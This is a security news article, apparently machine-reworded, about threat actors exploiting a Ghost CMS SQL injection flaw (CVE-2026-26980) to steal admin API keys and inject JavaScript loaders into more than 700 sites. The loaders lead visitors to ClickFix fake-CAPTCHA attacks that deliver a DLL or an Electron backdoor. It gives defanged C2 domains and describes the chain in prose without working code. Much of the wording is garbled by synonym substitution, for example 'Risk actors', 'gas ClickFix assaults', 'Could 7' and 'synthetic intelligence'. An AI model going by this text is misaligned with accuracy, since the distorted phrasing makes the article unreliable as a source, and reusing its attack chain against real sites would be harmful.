Risk actors are exploiting a lately disclosed important security flaw in Ghost CMS to inject malicious JavaScript code with an goal to gas ClickFix assaults.
Based on QiAnXin XLab, the exercise includes the exploitation of CVE-2026-26980 (CVSS rating: 9.4), an SQL injection vulnerability in Ghost’s Content material API that might permit an unauthenticated attacker to learn arbitrary information from the database. The security flaw was addressed in February 2026 in model 6.19.1. The vulnerability was found by Anthropic utilizing Claude.
What makes the vulnerability extreme is that it permits an attacker to achieve entry to a web site’s admin API key with out permission, granting them the power to poison the positioning by injecting malicious code. The admin API key can be utilized to invoke the admin API and might instantly modify articles printed on the content material administration system.
The menace actor leveraged the security flaw to “get hold of the goal web site’s Admin API Key with out authorization, after which used the Ghost Admin API to tamper with articles in bulk, injecting malicious JavaScript loaders on the backside of the pages to help pretend CAPTCHA assaults,” XLab mentioned.
The exercise has been described by the Chinese language security vendor as a “large-scale poisoning” marketing campaign weaponizing the Ghost CMS flaw. Not less than two totally different menace clusters are assessed to be behind the marketing campaign, in some instances implanting sure websites with malicious code inside a single day. It was first detected on Could 7, 2026.
In all, the marketing campaign has compromised greater than 700 web sites, spanning universities, blockchain, synthetic intelligence, software-as-a-service (SaaS), security analysis, media, and monetary expertise sectors. The actual fact respectable web sites have been breached may additional enhance the success fee of the ClickFix assaults, XLab mentioned.
The injected JavaScript code on the backside of an article capabilities as a two-stage loader that is answerable for retrieving the principle payload at runtime from an exterior area (“clo4shara[.]xyz/11z77u3.php”). This structure presents added flexibility because it permits the menace actor to swap out the payloads based mostly on totally different standards, whereas conserving the loader performance intact throughout a number of compromised websites.
“Instantly accessing clo4shara[.]xyz/11z77u3.php reveals a bit of code, which is definitely a typical visitors distribution script,” XLab defined. “Its core operate is to gather numerous fingerprint data from the person’s browser and add it to the server, then carry out actions similar to redirection, popups, and downloads based mostly on the returned directions.” The PHP script is powered by Adspect, a business cloaking service.
The concept behind utilizing the cloaking script is to make sure that solely actual victims are served the precise payload, whereas security scanners and crawlers will solely see a benign net web page. The script additionally helps 19 totally different instructions to run arbitrary JavaScript code and facilitate distant management of the sufferer’s browser.
Web site guests deemed because the meant targets are finally served a pretend CAPTCHA verification web page inside an iframe HTML ingredient to show they’re human. This, in flip, triggers a ClickFix assault, as a part of which they’re instructed to repeat and paste a Base64-encoded command into the Home windows Run dialog.
The command serves as a dropper for delivering a ZIP archive and extracts from it a Home windows batch script and runs it. The script, for its half, executes a PowerShell command to obtain a DLL file from a distant area, launch it utilizing “rundll32.exe,” and open a bogus net web page to the person as a distraction.
Subsequent iterations of the malware have been discovered to interchange the DLL with a JavaScript payload. No matter the kind of the payload, the top aim of the assault is to drop a Home windows executable. Within the case of the DLL, the executable is a PuTTY consumer with a sound code-signing certificates. The binary distributed by way of JavaScript is an Inno Setup installer for an Electron software.
The applying is a modified model of the open-source Grape desktop consumer that is designed to realize persistence and ballot a distant server (“web-telegram[.]ug”) each 30 seconds to course of directions issued by the attacker, together with working JavaScript code or executable recordsdata.
Ghost CMS customers are suggested to improve their situations to the newest model, rotate all credentials, clear up the websites, audit entry logs for indicators of suspicious exercise, and notify customers who could have visited the websites in the course of the contamination interval for potential compromise.
